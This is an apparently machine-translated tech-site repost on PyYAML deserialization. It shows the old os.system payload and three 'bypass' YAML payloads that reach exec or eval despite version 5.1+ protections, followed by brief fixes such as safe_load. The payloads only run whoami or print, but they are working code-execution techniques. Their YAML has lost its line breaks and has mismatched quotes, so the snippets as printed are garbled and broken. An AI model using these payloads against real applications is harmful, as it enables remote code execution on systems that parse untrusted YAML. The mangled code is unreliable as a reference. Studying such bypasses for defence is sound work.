Shulou(Shulou.com)05/31 Report--

This article will explain in detail about PyYAML deserialization defense and ByPass, the content of the article is of high quality, so the editor will share it with you for reference. I hope you will have some understanding of the relevant knowledge after reading this article.

PyYAML introduction

PyYAML is one of the outstanding modules of Python. PyYAML is a yaml library of python. Languages in yaml format have their own implementations for parsing (reading and saving) in yaml format. If you know anything about Python deserialization, you must have heard of it.

Historical vulnerabilities and fixes of PyYAML

Its deserialization vulnerability is still fresh in the memory of most Python security researchers.

When we use deserialization, we use the following load:

! python/object/new:os.system ["whoami"]

And PyYAML will execute os.system ("whoami") when loading with load (). This causes the command to execute, which outputs the user name.

This vulnerability has been fixed in version 5.1 +, and if the historical vulnerability payload is still used, you will get an error alert.

While constructing a Python instanceexpected a class, but found in "", line 1, column 1:!! python/object/new:os.system ["... ^

This greatly mitigates the impact of deserialization vulnerabilities because only some of the basic types can be deserialized.

PyYAML ByPass

When we look back at some of the basic types, we will notice the Python built-in methods exec, eval. There is a description in the manual.

Exec executes Python statements stored in strings or files, and can execute more complex Python code than eval,exec.

In this way the ByPass load can be obtained.

PayLoad1:

Import yamlpayload = "-!! python/object/new:str args: [] state:!! python/tuple -" print "-!! python/object/new:staticmethod args: [0] state: update:!! python/name:exec"yaml.load (payload) echo:-> vulnerability exists

PayLoad2:

Import yamlpayload = ""! "! python/object/new:type args: [" z ",!! python/tuple [], {" extend ":!! python/name:exec}] listitems:" print ('vulnerability exists') "yaml.load (payload) echo:-> vulnerability exists

PayLoad3:

Import yamlpayload = "!"! python/object/new:tuple -!! python/object/new:map -!! python/name:eval-[print ('vulnerability present')] "yaml.load (payload) echo:-> vulnerability exists

All three loads use the code in the basic type to execute the function, thus bypassing the defense measure of 5.1 +.

Repair method

1. Use safe_load to load serialized content according to the official recommendation.

2. Detect the load file header to prevent the loading code from executing the function.

About PyYAML deserialization defense and ByPass is how to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.